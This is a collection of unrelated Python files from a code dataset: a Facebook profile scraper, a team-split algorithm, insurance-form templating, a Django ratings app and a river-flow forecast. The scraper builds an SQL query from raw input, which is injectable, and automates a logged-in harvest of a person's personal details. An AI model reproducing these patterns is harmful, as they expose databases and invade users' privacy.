None\n\ndef validate(func):\n def inner(username):\n mycursor = mydb.cursor()\n mycursor.execute(\"SELECT * FROM user where username=\\'\"+username+\"\\'\")\n\n myresult = mycursor.fetchall()\n found=False\n for x in myresult:\n found=True\n\n 
if(found==False):\n raise ValueError('username is not valid!')\n else:\n previous= check(myresult)\n if(previous is not None):\n previous.show()\n else:\n func(username)\n\n return \"Task completed!\"\n\n return inner\n\n\n@validate\ndef scrap(username):\n\n URL= \"https://m.facebook.com/\"+username+\"/about\"\n r = requests.get(URL)\n \n soup = BeautifulSoup(r.content, 'html5lib') \n\n work= find_work(username, soup)\n name= find_name(username, soup)\n city=find_city(username, soup)\n find_fav(username)\n\n person= Person(name, city, work)\n\n person.show()\n\n person.upload(username)\n \n\ndef find_work(username, soup):\n\n for link in soup.find_all('div'):\n if link.string==\"कार्य\":\n break\n link=link.parent.parent.parent.parent.parent.parent.contents[1]\n work=[]\n for div in link.children:\n work.append(div.contents[0].contents[1].contents[0].contents[0].contents[0].string)\n return work\n\n\ndef find_name(username, soup):\n \n div= soup.find('h3')\n name= div.string\n\n return name\n\n\ndef find_city(username, soup):\n\n for link in soup.find_all('div'):\n if link.string==\"वर्तमान शहर\":\n break\n\n city=link.parent.parent.contents[1].contents[0].contents[0].string\n return city\n\ndef find_fav(username):\n\n driver = webdriver.Chrome() \n driver.maximize_window()\n time.sleep(2)\n\n driver.get(\"https://m.facebook.com/\"+username+\"/about\")\n time.sleep(2)\n driver.find_element(By.XPATH, '//*[@id=\"mobile_login_bar\"]/div[2]/a[2]').click()\n\n email = driver.find_element_by_id(\"m_login_email\")\n passwd = driver.find_element_by_id(\"m_login_password\")\n\n email.send_keys(email_pass.user_name)\n passwd.send_keys(email_pass.password)\n\n passwd.send_keys(Keys.RETURN)\n time.sleep(5)\n\n\n driver.find_element(By.XPATH, '//*[@id=\"checkpointSubmitButton-actual-button\"]').click()\n\n time.sleep(2)\n\n radioBtn1= driver.find_element(By.XPATH, '/html/body/div[1]/div/div[3]/form/div/article/section/div/fieldset/label[1]/div/div[2]/div')\n radioBtn1.click()\n\n time.sleep(1)\n\n driver.find_element(By.XPATH, '//*[@id=\"checkpointSubmitButton-actual-button\"]').click()\n\n time.sleep(5)\n\n driver.find_element(By.XPATH, '/html/body/div[1]/div/div[3]/form/div/article/section/div/div[2]/div/div[1]/div[2]/fieldset/label[25]/div/div[1]').click()\n\n time.sleep(1)\n\n driver.find_element(By.XPATH, '/html/body/div[1]/div/div[3]/form/div/article/section/div/div[2]/div/div[2]/div[2]/fieldset/label[11]/div/div[1]').click()\n\n time.sleep(1)\n\n driver.find_element(By.XPATH, '/html/body/div[1]/div/div[3]/form/div/article/section/div/div[2]/div/div[3]/div[2]/fieldset/label[7]/div/div[1]').click()\n\n time.sleep(3)\n\n driver.find_element(By.XPATH, '//*[@id=\"checkpointSubmitButton-actual-button\"]').click()\n\n time.sleep(3)\n\n driver.find_element(By.XPATH, '//*[@id=\"checkpointSubmitButton-actual-button\"]').click()\n\n time.sleep(3)\n\n SCROLL_PAUSE_TIME = 2\n\n# Get scroll height\n last_height = driver.execute_script(\"return document.body.scrollHeight\")\n\n while True:\n # Scroll down to bottom\n driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n\n # Wait to load page\n time.sleep(SCROLL_PAUSE_TIME)\n\n # Calculate new scroll height and compare with last scroll height\n new_height = driver.execute_script(\"return document.body.scrollHeight\")\n if new_height == last_height:\n break\n last_height = new_height\n\n time.sleep(2)\n\n driver.find_element(By.XPATH, \"//div[contains(text(),'Likes')]/../../div[3]/a\").click()\n\n time.sleep(3)\n\n 
driver.find_element(By.XPATH, '//*[@id=\"timelineBody\"]/div/div/div/div[1]/div/header/div/div[3]/a').click()\n\n time.sleep(3)\n\n\n fav =[]\n\n for span in driver.find_elements(By.XPATH, '/html/body/div[1]/div[1]/div[4]/div/div/div/div/div/div/div/div/div[1]/div[*]/div/span'):\n fav.append(span.text)\n\n for span in driver.find_elements(By.XPATH, '/html/body/div[1]/div[1]/div[4]/div/div/div/div/div/div/div/div/div[2]/div[*]/div/span'):\n fav.append(span.text)\n\n print(\"here's the list of my favourites: \")\n print(fav)\n print()\n\n driver.quit()\n\n\n# usname=\"anshul.d.sharma.7\"\n# scrap(usname)","sub_path":"task3/task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":6171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"405847425","text":"#!/usr/bin/env python3\n# coding: utf-8\n\nfrom itertools import combinations as cm\nimport math\n\ndef main():\n n = int(input())\n data = [list(map(int,input().split())) for _ in range(n)]\n\n min_ans = 123456789\n\n for case in cm(range(1,n+1),n//2):\n s1 = s2 = 0\n\n for i in case:\n for j in case:\n s1+=data[i-1][j-1]\n\n res = set(range(1, n + 1)) - set(case)\n for i in res:\n for j in res:\n s2 += data[i-1][j-1]\n\n min_ans=min([min_ans,abs(s1-s2)])\n\n print(min_ans)\n\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"Python/SEOKCHAN/백트랙킹/8.스타트와링크.py","file_name":"8.스타트와링크.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"636852227","text":"# BSD 3-Clause License\n\n# Copyright (c) 2016, Rob Haverkamp\n# All rights reserved.\n\nimport yaml\nfrom bob.errors import BobError\n\ndef parse(file):\n try:\n with open(file) as stream:\n config = yaml.load(stream)\n except OSError:\n raise BobError(\"Can not open yaml file\")\n return config\n","sub_path":"bob/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"613830364","text":"class Solution:\n def minMeetingRooms(self, intervals: List[List[int]]) -> int:\n if not intervals:\n return 0\n result, curr = 0, 0\n for i, val in sorted(\n x for interval in intervals for x in [(interval[0], 1), (interval[1], -1)]\n ):\n curr += val\n result = max(curr, result)\n return result\n\n\n# import heapq\n#\n#\n# class Solution:\n# def minMeetingRooms(self, intervals: List[List[int]]) -> int:\n# if not intervals: return 0\n# q = []\n# for interval in sorted(intervals, key=lambda x: x[0]):\n# if not q:\n# heapq.heappush(q, interval[1])\n# else:\n# if interval[0] >= q[0]:\n# heapq.heappop(q)\n# heapq.heappush(q, interval[1])\n# return len(q)\n","sub_path":"MY_REPOS/INTERVIEW-PREP-COMPLETE/Leetcode/253.py","file_name":"253.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"65429868","text":"from taa.services.docusign.service import DocuSignServerTemplate, DocuSignRadioTab, DocuSignTextTab\nfrom taa.services.docusign.DocuSign_config import get_template_id\nfrom taa.services.products import ProductService\n\nproduct_service = ProductService()\n\n\nclass GroupCITemplate(DocuSignServerTemplate):\n def __init__(self, recipients, enrollment_data, use_docusign_renderer):\n\n product_type = enrollment_data.get_product_code()\n \n # Use the case situs state to select the form for this product.\n #state = 
enrollment_data[\"enrollState\"]\n state = enrollment_data.case.situs_state\n \n template_id = get_template_id(product_type, state)\n\n DocuSignServerTemplate.__init__(self, template_id, recipients, use_docusign_renderer)\n\n self.data = enrollment_data\n\n def num_children_on_form(self):\n return 4\n\n def is_child_attachment_form_needed(self):\n return self.data.get_num_covered_children() > self.num_children_on_form()\n\n def get_attachment_children(self):\n return self.data.get_covered_children()[self.num_children_on_form():] if len(self.data.get_covered_children()) > self.num_children_on_form() else []\n\n def should_include_bank_draft(self):\n return self.data.should_include_bank_draft()\n\n def generate_tabs(self, recipient, purpose):\n\n tabs = super(GroupCITemplate, self).generate_tabs(recipient, purpose)\n\n if recipient.is_agent() or self.data.did_finish_signing_in_wizard():\n tabs += self.convert_to_tab_objects(self.make_agent_tabs())\n\n if recipient.is_employee() or self.data.should_use_call_center_workflow():\n tabs += self.convert_to_tab_objects(self.make_employee_tabs())\n\n return tabs\n\n def make_agent_tabs(self):\n agent_radios = []\n \n # identical to whatever EE said\n agent_radios.append(\n {\n 'groupName': 'existingInsAgent',\n 'radios': [\n {\n 'selected': 'True',\n 'value': self.data['existing_insurance']\n }\n ]\n }\n )\n agent_radios.append(\n {\n 'groupName': 'replaceAgent',\n 'radios': [\n {\n 'selected': 'True',\n 'value': self.data['replacing_insurance']\n }\n ]\n }\n )\n\n return {'radioGroupTabs': agent_radios}\n\n def convert_to_tab_objects(self, docusign_tabs):\n \"Takes docusign-formatted tab dicts and converts them to our internal, intermediate representation that our PDF renderer understands.\"\n tabs = []\n\n if 'radioGroupTabs' in docusign_tabs:\n for tab in docusign_tabs['radioGroupTabs']:\n for radio in tab['radios']:\n if radio.get('selected') == \"True\":\n tabs.append(DocuSignRadioTab(group_name=tab['groupName'], value=radio['value'], is_selected=\"True\"))\n\n if 'textTabs' in docusign_tabs:\n for tab in docusign_tabs['textTabs']:\n tabs.append(DocuSignTextTab(name=tab['tabLabel'], value=tab['value']))\n\n return tabs\n\n def make_employee_tabs(self):\n # To get the legacy code below to work, make this a local variable.\n enrollment_data = self.data\n\n idToken = enrollment_data.get_id_token()\n idTokenStr = 'Authentication via Date of Hire: ' + idToken\n\n SOH_RadiosList = []\n SOH_GI_Tabs = []\n\n eeCoverageNullToken = 'NONE'\n if enrollment_data['employee_coverage']:\n if enrollment_data['employee_coverage']['face_value']:\n employeeCoverage = format(\n float(enrollment_data['employee_coverage']['face_value']), ',.0f')\n eePremium = format(float(enrollment_data['employee_coverage']['premium']), ',.2f')\n SOH_RadiosList += generate_SOHRadios(\n 'ee', enrollment_data.get_employee_soh_questions())\n SOH_GI_Tabs += generate_SOH_GI_tabs(\n 'ee', enrollment_data.get_employee_soh_questions())\n else:\n employeeCoverage = eeCoverageNullToken\n eePremium = ' '\n else:\n employeeCoverage = eeCoverageNullToken\n eePremium = ' '\n\n if enrollment_data['spouse_coverage']:\n if enrollment_data['spouse_coverage']['face_value']:\n spouseCoverage = format(\n float(enrollment_data['spouse_coverage']['face_value']), ',.0f')\n spPremium = format(float(enrollment_data['spouse_coverage']['premium']), ',.2f')\n SOH_RadiosList += generate_SOHRadios(\n 'sp', enrollment_data.get_spouse_soh_questions())\n SOH_GI_Tabs += generate_SOH_GI_tabs(\n 'sp', 
enrollment_data.get_spouse_soh_questions())\n else:\n spouseCoverage = ' '\n spPremium = ' '\n else:\n spouseCoverage = ' '\n spPremium = ' '\n\n childTabsList = []\n childRadiosList = []\n for i, child in enumerate(enrollment_data['children']):\n if (not enrollment_data['children'][i] or\n not enrollment_data['child_coverages'][i]):\n continue\n childTabsList += generate_ChildTabsEntry(i, enrollment_data)\n childRadiosList.append(generate_ChildGenderRadio(i, enrollment_data))\n childRadiosList += generate_SOHRadios('c%s' % (i+1), enrollment_data.get_child_soh_questions(i))\n SOH_GI_Tabs += generate_SOH_GI_tabs('c%s' % (i+1), enrollment_data.get_child_soh_questions(i))\n\n agent_code = enrollment_data.get_agent_code()\n agent_signing_name = enrollment_data.get_agent_signing_name()\n\n eeTabsList = make_applicant_tabs('ee', enrollment_data['employee'])\n\n eeEmail = enrollment_data['employee']['email'] if enrollment_data['employee']['email'] else ''\n\n eeTabsList += [\n make_tab('eeEnrollCityState', u'{}, {}'.format(\n enrollment_data['enrollCity'], enrollment_data['enrollState'])),\n make_tab('identityToken', idTokenStr),\n make_tab('agentCode', agent_code),\n make_tab('agentSignName', agent_signing_name),\n make_tab('eeCoverage', employeeCoverage),\n make_tab('eePremium',\n eePremium if employeeCoverage != eeCoverageNullToken else ''),\n make_tab('Employer', enrollment_data.case.company_name),\n make_tab('eeOtherOwnerName',\n enrollment_data['employee_other_owner_name'] if (\n enrollment_data['employee_owner'] == 'other') else ''),\n make_tab('eeOtherOwnerName2',\n enrollment_data['employee_other_owner_name'] if (\n enrollment_data['employee_owner'] == 'other') else ''),\n make_tab('eeOtherOwnerSSN',\n enrollment_data['employee_other_owner_ssn'] if (\n enrollment_data['employee_owner'] == 'other') else ''),\n make_tab('eeEmail', eeEmail)\n ]\n\n eeTabsList += make_contact_tabs('ee', enrollment_data['employee'])\n\n if enrollment_data['spouse_owner'] == 'other':\n spouseOtherOwnerName = enrollment_data['spouse_other_owner_name']\n spouseOtherOwnerSSN = enrollment_data['spouse_other_owner_ssn']\n elif enrollment_data['spouse_owner'] == 'employee':\n spouseOtherOwnerName = u'{} {}'.format(\n enrollment_data['employee']['first'],\n enrollment_data['employee']['last'])\n spouseOtherOwnerSSN = enrollment_data['employee']['ssn']\n else:\n spouseOtherOwnerName = ''\n spouseOtherOwnerSSN = ''\n\n spouseTabsList = []\n if spouseCoverage != ' ':\n spouseTabsList += make_applicant_tabs('sp', enrollment_data['spouse'])\n spouseTabsList += [\n {\n 'tabLabel': 'spOtherOwnerName',\n 'value': spouseOtherOwnerName\n },\n {\n 'tabLabel': 'spOtherOwnerSSN',\n 'value': spouseOtherOwnerSSN\n },\n {\n 'tabLabel': 'spCoverage',\n 'value': spouseCoverage\n },\n {\n 'tabLabel': 'spPremium',\n 'value': spPremium\n }\n ]\n\n generalRadiosList = []\n generalRadiosList.append(\n {\n 'groupName': 'existingIns',\n 'radios': [\n {\n 'selected': 'True',\n 'value': enrollment_data['existing_insurance']\n }\n ]\n }\n )\n generalRadiosList.append(\n {\n 'groupName': 'replace',\n 'radios': [\n {\n 'selected': 'True',\n 'value': enrollment_data['replacing_insurance']\n }\n ]\n }\n )\n for (prefix_short, prefix_long) in {('ee', 'employee'), ('sp', 'spouse')}:\n if prefix_long == 'employee' or (prefix_long == 'spouse' and spouseCoverage.strip()):\n generalRadiosList.append(\n {\n 'groupName': prefix_short + 'Gender',\n 'radios': [\n {\n 'selected':\n 'True' if (enrollment_data[prefix_long] and\n 
enrollment_data[prefix_long]['gender'] == 'male') else 'False',\n 'value': 'male'\n },\n {\n 'selected':\n 'True' if (enrollment_data[prefix_long] and\n enrollment_data[prefix_long]['gender'] == 'female') else 'False',\n 'value': 'female'\n }\n ]\n }\n )\n if enrollment_data[prefix_long] and 'is_smoker' in enrollment_data[prefix_long] and enrollment_data[prefix_long]['is_smoker'] != None:\n generalRadiosList.append(\n {\n 'groupName': prefix_short + 'Smoking',\n 'radios': [\n {\n 'selected': 'True' if enrollment_data[prefix_long]['is_smoker'] else 'False',\n 'value': 'smoker'\n },\n {\n 'selected': 'True' if not enrollment_data[prefix_long]['is_smoker'] else 'False',\n 'value': 'nonsmoker'\n }\n ]\n }\n )\n # only include Owner checkbox if coverage was selected\n if ((prefix_short == 'ee' and\n employeeCoverage != eeCoverageNullToken) or\n (prefix_short == 'sp' and spouseCoverage != ' ')):\n generalRadiosList.append(\n {\n 'groupName': prefix_short + 'Owner',\n 'radios': [\n {\n 'selected':\n 'True' if enrollment_data[prefix_long + '_owner'] == 'self' else 'False',\n 'value': 'self'\n },\n {\n 'selected':\n 'True' if ((enrollment_data[prefix_long + '_owner'] == 'other') or\n (enrollment_data[prefix_long + '_owner'] == 'employee')) else 'False',\n 'value': 'other'\n }\n ]\n }\n )\n\n return {\n 'textTabs':\n eeTabsList + spouseTabsList + childTabsList + SOH_GI_Tabs,\n 'radioGroupTabs':\n generalRadiosList + SOH_RadiosList + childRadiosList\n }\n\n\ndef generate_SOHRadios(prefix, soh_questions):\n radioList = []\n for i, soh_question in enumerate(soh_questions):\n if soh_question['answer'] and soh_question['answer'].upper() == 'GI':\n # GI - skip for now\n selected = 'False'\n answer = 'GI'\n else:\n selected = 'True'\n answer = 'no'\n radioList.append({\n 'groupName': prefix + 'SOH' + str(i+1),\n 'radios': [{'selected': selected, 'value': answer}],\n })\n return radioList\n\n\ndef generate_SOH_GI_tabs(prefix, soh_questions):\n tabs = []\n for i, soh_question in enumerate(soh_questions):\n if soh_question['answer'] and soh_question['answer'].upper() == 'GI':\n # GI - skip for now\n answer = 'GI'\n else:\n answer = ''\n tabs.append(make_tab('{prefix}SOH{i}gi'.format(prefix=prefix, i=i+1), answer))\n return tabs\n\n\ndef generate_ChildGenderRadio(child_index, wizard_data):\n return {\n 'groupName': 'child' + str(child_index + 1) + 'Gender',\n 'radios': [\n {\n 'selected': 'True' if wizard_data['children'][child_index]['gender'] == 'male' else 'False',\n 'value': 'male'\n },\n {\n 'selected': 'True' if wizard_data['children'][child_index]['gender'] == 'female' else 'False',\n 'value': 'female'\n }\n ]}\n\n\ndef generate_ChildGenderAbbrevTab(child_index, wizard_data):\n if wizard_data['children'][child_index]['gender'] == 'male':\n genderAbbrev = 'M'\n elif wizard_data['children'][child_index]['gender'] == 'female':\n genderAbbrev = 'F'\n else:\n genderAbbrev = ''\n return {'tabLabel': 'child' + str(child_index + 1) + 'GenderAbbrev',\n 'value': genderAbbrev}\n\n\ndef generate_ChildTabsEntry (child_index, wizard_data):\n childStr = 'child' + str(child_index +1)\n child_coverage = wizard_data['child_coverages'][child_index]\n tabsList = [\n # FullName is only used for child >2, otherwise FName and LName on\n # child <=2 assuming for now the Docusign API will ignore those tabs\n # not used in the template\n {\n 'tabLabel': childStr + 'FullName',\n 'value': u'{} {}'.format(\n wizard_data['children'][child_index]['first'],\n wizard_data['children'][child_index]['last'])\n },\n {\n 'tabLabel': 
childStr + 'FName',\n 'value': wizard_data['children'][child_index]['first']\n },\n {\n 'tabLabel': childStr + 'LName',\n 'value': wizard_data['children'][child_index]['last']\n },\n {\n 'tabLabel': childStr + 'DOB',\n 'value': wizard_data['children'][child_index]['birthdate']\n },\n {\n 'tabLabel': childStr + 'SSN',\n 'value': wizard_data['children'][child_index]['ssn']\n },\n {\n 'tabLabel': childStr + 'Coverage',\n 'value': format(float(child_coverage['face_value']), ',.0f') if child_coverage else ''\n },\n {\n 'tabLabel': childStr + 'Premium',\n 'value':\n format(float(child_coverage['premium']), ',.2f') if child_coverage else ''\n },\n ]\n return tabsList\n\n\ndef make_tab(name, val):\n return dict(tabLabel=name, value=val)\n\n\ndef make_radio_tab(group_name, selected, val):\n return {\n 'groupName': group_name,\n 'radios': [\n {\n 'selected': 'True' if selected else 'False',\n 'value': val,\n }\n ]\n }\n\n\ndef make_applicant_tabs(prefix, data):\n tabs = [\n make_tab(prefix + 'FName', data['first']),\n make_tab(prefix + 'LName', data['last']),\n make_tab(prefix + 'DOB', data['birthdate']),\n make_tab(prefix + 'SSN', data['ssn']),\n ]\n if data.get('height'):\n height_ft = '%s' % int(float(data['height'])/12.0)\n height_in = '%s' % int(float(data['height'])%12.0)\n tabs += [\n make_tab(prefix + 'HeightFt', height_ft),\n make_tab(prefix + 'HeightIn', height_in),\n ]\n if data.get('weight'):\n tabs += [make_tab(prefix + 'Weight', data['weight'])]\n return tabs\n\n\ndef make_contact_tabs(prefix, data):\n return [\n make_tab(prefix + 'Street1', data['address1']),\n make_tab(prefix + 'Street2',\n data['address2'] if 'address2' in data else ''),\n make_tab(prefix + 'City', data['city']),\n make_tab(prefix + 'State', data['state']),\n make_tab(prefix + 'Zip', data['zip']),\n make_tab(prefix + 'Phone', data['phone']),\n make_tab(prefix + 'Email', data['email']),\n ]","sub_path":"taa/services/docusign/templates/group_ci.py","file_name":"group_ci.py","file_ext":"py","file_size_in_byte":17371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"432047346","text":"import six\n\nfrom flex.serializers.core import ParameterSerializer\nfrom flex.paths import (\n get_path_parameter_values,\n get_parameter_names_from_path,\n path_to_pattern,\n)\nfrom flex.constants import (\n INTEGER,\n STRING,\n PATH,\n)\n\n\nID_IN_PATH = {\n 'name': 'id', 'in': PATH, 'description': 'id', 'type': INTEGER, 'required': True,\n}\nUSERNAME_IN_PATH = {\n 'name': 'username', 'in': PATH, 'description': 'username', 'type': STRING, 'required': True\n}\n\n\n#\n# get_path_parameter_values tests\n#\ndef test_getting_parameter_values_from_path():\n serializer = ParameterSerializer(many=True, data=[\n ID_IN_PATH,\n USERNAME_IN_PATH,\n ])\n assert serializer.is_valid(), serializer.errors\n parameters = serializer.object\n\n values = get_path_parameter_values(\n request_path='/get/fernando/posts/1234/',\n api_path='/get/{username}/posts/{id}/',\n path_parameters=parameters\n )\n assert len(values) == 2\n assert 'username' in values\n assert 'id' in values\n assert isinstance(values['username'], six.string_types)\n assert isinstance(values['id'], int)\n\n\n#\n# get_parameter_names_from_path tests\n#\ndef test_non_parametrized_path_returns_empty():\n path = \"/get/with/no-parameters\"\n names = get_parameter_names_from_path(path)\n assert len(names) == 0\n\n\ndef test_getting_names_from_parametrized_path():\n path = \"/get/{username}/also/{with_underscores}/and/{id}\"\n names = 
get_parameter_names_from_path(path)\n assert len(names) == 3\n assert (\"username\", \"with_underscores\", \"id\") == names\n\n\n#\n# path_to_pattern tests\n#\ndef test_undeclared_api_path_parameters_are_skipped():\n \"\"\"\n Test that parameters that are declared in the path string but do not appear\n in the parameter definitions are ignored.\n \"\"\"\n path = '/get/{username}/posts/{id}/'\n serializer = ParameterSerializer(many=True, data=[\n ID_IN_PATH,\n ])\n assert serializer.is_valid(), serializer.errors\n parameters = serializer.object\n pattern = path_to_pattern(path, parameters)\n assert pattern == '^/get/\\{username\\}/posts/(?P.+)/$'\n","sub_path":"tests/core/test_path_utils.py","file_name":"test_path_utils.py","file_ext":"py","file_size_in_byte":2118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"145920837","text":"import string\nfrom sys import argv\n\nscript, arg1 = argv\narg1 = int(arg1)\n\nHOSTS = \"\"\nCONFIGTX = \"\"\nCRYPTOCONFIG = \"\"\nPEERNUMBER = \"\"\nPEERADMINCARD = \"\"\narg1 -= 1\nfor i in range(arg1):\n HOSTS += 'HOST' + str(i+2) + '=10.160.2.' + str(i+6) + '\\n'\n\nfor i in range(arg1):\n CONFIGTX += 'sed -i -e \"s/{IP-HOST-' + str(i+2) + '}/$HOST' + str(i+2) + '/g\" configtx.yaml\\n'\n\nfor i in range(arg1):\n CRYPTOCONFIG += 'sed -i -e \"s/{IP-HOST-' + str(i+2) + '}/$HOST' + str(i+2) + '/g\" crypto-config.yaml\\n'\n\nfor i in range(arg1):\n PEERNUMBER += 'sed -i -e \"s/{IP-HOST-1}/$HOST1/g\" docker-compose-peer' + str(i+2) + '.yml\\n'\n PEERNUMBER += 'sed -i -e \"s/{IP-HOST-' + str(i+2) + '}/$HOST' + str(i+2) + '/g\" docker-compose-peer' + str(i+2) + '.yml\\n'\n\nfor i in range(arg1):\n PEERADMINCARD += 'sed -i -e \"s/{IP-HOST-' + str(i+2) + '}/$HOST' + str(i+2) + '/g\" ../createPeerAdminCard.sh\\n'\n\nfile = \"\"\"#!/bin/bash\ncd \"$(dirname \"$0\")\"\nHOST1=10.160.2.5\n\"\"\" + HOSTS + \"\"\"\nsed -i -e \"s/{IP-HOST-1}/$HOST1/g\" configtx.yaml\n\"\"\" + CONFIGTX + \"\"\"\nsed -i -e \"s/{IP-HOST-1}/$HOST1/g\" crypto-config.yaml\n\"\"\" + CRYPTOCONFIG + \"\"\"\nsed -i -e \"s/{IP-HOST-1}/$HOST1/g\" docker-compose.yml\n\"\"\" + PEERNUMBER + \"\"\"\nsed -i -e \"s/{IP-HOST-1}/$HOST1/g\" ../createPeerAdminCard.sh\n\"\"\" + PEERADMINCARD + \"\"\"\n\ncryptogen generate --config=./crypto-config.yaml\nexport FABRIC_CFG_PATH=$PWD\nconfigtxgen -profile ComposerOrdererGenesis -outputBlock ./composer-genesis.block\nconfigtxgen -profile ComposerChannel -outputCreateChannelTx ./composer-channel.tx -channelID composerchannel\n\nORG1KEY=\"$(ls crypto-config/peerOrganizations/org1.example.com/ca/ | grep 'sk$')\"\n\nsed -i -e \"s/{ORG1-CA-KEY}/$ORG1KEY/g\" docker-compose.yml\n\"\"\"\n\ntext_file = open(\"composer/howtobuild.sh\", \"w\")\ntext_file.write(file)\ntext_file.close()","sub_path":"config-all/howtobuildterraform.py","file_name":"howtobuildterraform.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"87888670","text":"from datetime import datetime\nfrom statistics import mean\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\nfrom ratings.forms import RatingForm\nfrom ratings.models import Link, Movie, Rating, Movie_Genre, Tag, Rater\n\n\n# Create your views here.\ndef movie_view(request, movie_id):\n movie = Movie.objects.get(id=movie_id)\n genres = Movie_Genre.objects.filter(movie=movie)\n tags = Tag.objects.filter(id=movie_id)\n link = Link.objects.get(movie=movie)\n if 
request.POST:\n if \"delete\" in request.POST:\n Rating.objects.get(movie=movie, rater=request.user.rater).delete()\n else:\n Rating.objects.get_or_create(movie=movie, rater=request.user.rater,\n defaults={\"rating\": request.POST[\"rating\"],\n \"timestamp\": int(datetime.now().timestamp())})\n movie.calculate_average_rating()\n avg_rating = round(movie.average_rating, 1)\n context = {\"movie\": movie, \"tags\": tags, \"genres\": genres, \"link\": link, \"avg_rating\": avg_rating}\n if request.user:\n rating = Rating.objects.filter(movie=movie, rater=request.user.rater)\n context[\"form\"] = RatingForm()\n if rating:\n context[\"rating\"] = rating[0]\n context[\"form\"].rating = rating[0]\n return render_to_response(\"movies.html\", context, context_instance=RequestContext(request))\n\n\ndef rater_view(request, rater_id):\n rater = Rater.objects.get(id=rater_id)\n ratings = Rating.objects.filter(rater=rater)\n avg_rating = str(mean([rating.rating for rating in ratings]))[:3]\n tags = Tag.objects.filter(rater=rater)\n context = {\"rater\": rater, \"ratings\": ratings, \"avg_rating\": avg_rating, \"tags\": tags}\n return render_to_response(\"raters.html\", context, context_instance=RequestContext(request))\n\n\ndef top_movie_view(request):\n top_movies = Movie.objects.all().order_by(\"-average_rating\")[:20]\n context = {\"top_movies\": top_movies}\n return render_to_response(\"top_movies.html\", context, context_instance=RequestContext(request))\n\n","sub_path":"movieratings/ratings/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"407750510","text":"def binaryNumber(number):\n result=0\n lenght=len(number)\n for i in range(lenght):\n result+=int(number[i])*(2**(lenght-i-1))\n return result\n\ndef searchForDegree(number,numberInPower):\n for i in range(int(numberInPower)):\n power=number**i\n if power >= numberInPower:\n return i\n\ndef numberBinary(x):\n n = \"\"\n while x > 0:\n y = str(x % 2)\n n = y + n\n x = int(x / 2)\n return n\n\nimport itertools\nbinaryTape=\"\"\ncombinationsOptions=[]\npossibleNumbers=[]\n\nfor line in open(\"Text\"):\n values= line.split(\",\")\nbinary=values[0]\nvalue=int(values[1][0:])\n\nfor i in range(searchForDegree(value,binaryNumber(binary))+1):\n n=numberBinary(value**i)\n possibleNumbers.append(int(n))\n\nfor p in itertools.product(possibleNumbers, repeat=3):\n binaryTape=str(p[0])+str(p[1])+str(p[2])\n if binaryTape == binary :\n combinationsOptions.append(p)\n a=\"\"\n\nprint(possibleNumbers)\nprint(binary,value)\nprint(combinationsOptions)\n\n","sub_path":"algorithmLab5/fantz.py","file_name":"fantz.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"265601220","text":"# Adam Stratman\n# 10/31/20\n\n\n# %%\n# Import the modules we will use\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport datetime\nimport os\nimport json\nimport urllib.request as req\nimport urllib\nfrom sklearn.linear_model import LinearRegression\n\n# Note you may need to do pip install for sklearn\n\n\n# %%\n# Building a function for flow prediction outside of the AR model\ndef real_prediction(indexnumber, last_week_flow, last2_week_flow=None):\n ''''\n This function is prepping the linear regression model to be\n multiplied by a correction factor to bring it down to a more\n reasonable value for the forecast of week 1 and week 
2.\n '''\n if indexnumber == 0 and last2_week_flow is None:\n rp = (model.intercept_ + model.coef_[indexnumber] * last_week_flow)\n if indexnumber == 1:\n rp = (model2.intercept_ + model2.coef_[0] * last_week_flow +\n model2.coef_[indexnumber] * last2_week_flow)\n if indexnumber != 0 and indexnumber != 1:\n print('The index number =', indexnumber, 'is not valid. Enter 0 or 1.')\n return rp\n\n\n# %%\n# ** MODIFY **\n# 1) the location of the data --- this time on the internet\n# 2) You need to know how its formatted.\n\nurl = \"https://waterdata.usgs.gov/nwis/dv?cb_00060=on&format=rdb&site_no=09506000&referred_module=sw&period=&begin_date=1989-01-01&end_date=2020-10-19\"\n\n# Now we can read it with read_table command the same as we did before\n# Note this only works if you select the tab separated data --- try it with table and you will see it doesn't\ndata2 = pd.read_table(url, skiprows=30, names=['agency_cd', 'site_no',\n 'datetime', 'flow', 'code'],\n parse_dates=['datetime'], index_col='datetime')\n\n#separating url onto multiple lines\nurl = \"https://waterdata.usgs.gov/nwis/dv?cb_00060=on&format=rdb&site_no=09506000\" \\\n \"&referred_module=sw&period=&begin_date=1989-01-01&end_date=2020-10-19\"\n\n#Replace parts of my url with variables\nsite = '09506000'\nstart = '1989-01-01'\nend = '2020-10-31'\nurl = \"https://waterdata.usgs.gov/nwis/dv?cb_00060=on&format=rdb&site_no=\" + site + \\\n \"&referred_module=sw&period=&begin_date=\" + start + \"&end_date=\" + end\ndata2 = pd.read_table(url, skiprows=30, names=['agency_cd', 'site_no',\n 'datetime', 'flow', 'code'],\n parse_dates=['datetime'], index_col='datetime')\n\n\n# %%\n# Read the data into a pandas dataframe\ndata = pd.read_table(url, sep='\\t', skiprows=30,\n names=['agency_cd', 'site_no', 'datetime', 'flow',\n 'code'],\n parse_dates=['datetime'])\n# Expand the dates to year month day\ndata['year'] = pd.DatetimeIndex(data['datetime']).year\ndata['month'] = pd.DatetimeIndex(data['datetime']).month\ndata['day'] = 